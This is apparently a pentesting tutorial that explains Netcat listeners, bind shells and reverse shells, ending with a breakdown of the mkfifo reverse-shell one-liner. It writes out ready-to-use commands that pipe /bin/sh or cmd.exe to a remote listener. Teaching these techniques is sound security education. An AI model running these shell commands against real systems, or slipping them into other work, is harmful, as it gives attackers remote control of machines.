Netcat (nc, ncat, or the swiss army knife of networking, as some might prefer to call it) is a command-line utility that every self-respecting pentester should carry under their belt. Attackers often use Netcat to create reverse shells on a target machine. This article will cover the different ways to perform this.

Before we start, this article supposes that you have a basic knowledge of networking, how computers communicate, and what ports and IP addresses are. If this sounds like Chinese to you, then you should probably learn about computer networking first.

With that being said, let’s cut to the chase.

Introduction to Netcat

Netcat is a command-line tool for establishing TCP and UDP network connections, and reading/writing to them. To try to explain the different applications of this utility will take an entire book, not just an article.

So, in order to avoid boring you with a lengthy post, we are going to cover here the basic uses of Netcat in Pentesting and Ethical Hacking, as that is what we are here for, right?

At its most basic level, Netcat is just a tool to interact (read/write) with a connection between two nodes over a network.

Using Netcat to create a network connection

In order to make a network connection between two nodes, one of them will need to be listening on a specific port, while the other initiates the connection to that port.

At the first node, you can activate the listening port by running the following command.

nc -l -p <Port-Number>

The -l flag indicates that you are running Netcat in the listening mode.

You have to specify a number after the -p flag to indicate which port will Netcat be listening on.

Once you have run the above command, the node will open the specified port and wait for incoming connections.

We can now go to the second machine and initiate a connection with the listening node.

To do so, you can run the following command:

nc <IP-Address> <Port-Number>

The provided IP address should be that of the listening node, and the port number is the same one that we specified earlier with the -p flag.

Now, to demonstrate how that works with a real example, I have launched two terminals and typed the two commands we just learned to simulate a connection. Here is the result:

For the listener command, we can add the -v flag, which will make Netcat more verbose. This will display a message when a connection is established, which is more convenient than having a blank screen.

We can also add the -n flag, which will tell Netcat that we are only working with IP addresses and no DNS name resolution is needed. This will make it much faster.

By combining all these flags, the resulting listener command will look like this:

nc -lvnp <Port-number>

Bind and Reverse Shells Using Netcat

Now that we have an idea of how Netcat works, let’s discuss a bit of theory for a minute.

Unless you’re a complete noob in hacking, or in computer science in general, you should have an idea of what the shell is. Well, just in case you don’t (and there’s no shame in that, we are all here to learn), here is a brief definition.

A shell is basically any program that takes commands from a user and sends them down to the operating system level for execution. It then sends back the result of this execution to the user.

Bash, cmd, and Powershell are all examples of popular shells.

As a pentester, sometimes you will succeed in exploiting a remote code execution vulnerability on a target system. Now, in order to gain initial access to that system, you will have to spawn a shell that will allow you to run commands interactively on the target operating system.

To perform this, you will have two ways to go from there: Bind or Reverse shell.

Bind Shell

Spawning a bind shell requires you to run a listener on the target system, and then you connect to that listener from your machine.

The command to establish the connection will be the same as we’ve seen in the previous section.

nc <IP-address> <Port-number>

However, for the second command, there will be a small difference.

nc -lvnp <Port-number> -e /bin/bash

When trying to activate a listener, The nc command will have another option -e. When you use this flag, Netcat will execute the specified command after establishing the connection. In this case, we have provided /bin/bash as the command that will be executed. This will give us a bash shell on the target machine when the connection is established.

Note that this command will only work in a Linux system. In the case of Windows, a small adjustment is necessary. You can simply replace /bin/bash with cmd.exe.

Reverse Shell

In a reverse shell, which hackers tend to use more often than bind shells, the attacker will run a listener on their machine. And then, they will initiate the connection by running a command on the target machine that will connect back to the listener that the attacker is running.

To spawn a reverse shell, you should first run a simple listener on your machine.

nc -lvnp <Port-number>

On the other end, we will have to provide the -e option when running the command on the target machine.

nc <IP-address> <Port-number> -e /bin/bash

Once we run the above command, we should get a reverse shell on our machine.

Here again, if you are targeting a Windows machine, you can change /bin/bash with cmd.exe.

The Mkfifo and Netcat One-liner Reverse Shell

Before we end this article, there is one important command that we should discuss. This is one that is very popular among the hacking community and is used very often to spawn reverse shells.

Sometimes, the classical way to spawn a reverse shell may not work. When that happens, you will have to take out the big guns. This one-liner will give you the shell when others won’t. You should add it to your pentesting arsenal, and keep it at hand’s reach.

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP-Address> <Port-number> >/tmp/f

Instead of copying and pasting this command each time you need it without having a clue about how it works, wouldn’t it be great to understand how and why it works? Well, if you agree, then this is what we are going to cover in this section.

We can break this line down to 3 commands:

• rm -f /tmp/f
• mkfifo /tmp/f
• cat /tmp/f|/bin/sh -i 2>&1|nc <IP-Address> <Port-Number> > /tmp/f

Let’s Break it down

Now, the first command is simple. It simply deletes the file /tmp/f in case it already exists.

Next, we create a named pipe using the command mkfifo. A named pipe (or FIFO file) is basically a file that multiple processes can read from and write to. It can therefore be used when processes need to exchange data.

And then, we get to the last and most interesting command: cat /tmp/f|/bin/sh -i 2>&1|nc <IP-Address> <Port-Number> > /tmp/f

This command will first read the content of the FIFO file that the previous command created (cat /tmp/f), and sends its content to /bin/sh -i. This will execute whatever commands are in the file /tmp/f.

Then, stderr will be redirected to stdout, which is implied by the 2>&1 portion of the command. In other words, this will redirect whatever error that the command generates to the standard output. 

In the next step, Netcat will send the standard output it receives from the previous command to the host with the given IP address and the given port : nc <IP-Address> <Port-Number>. Of course, this supposes that there is a host with this IP address that is listening on this port.

Finally, netcat will send whatever data that it receives from the remote host to the FIFO file > /tmp/f.

And then, the loop starts again by reading /tmp/f, running its content using /bin/sh, and so on…

To make this process clear, I’ve put together a figure that illustrates what happens when you spawn a reverse shell using this command. Here, we suppose that the attacker runs the command whoami on the reverse shell.

Conclusion

We have reached the end of this article. We have learned about how to use Netcat, what are bind and reverse shells, how to create them using Netcat, and finally, we have broken down the mkfifo netcat one-liner. Now, Netcat should not be a mystery to you anymore.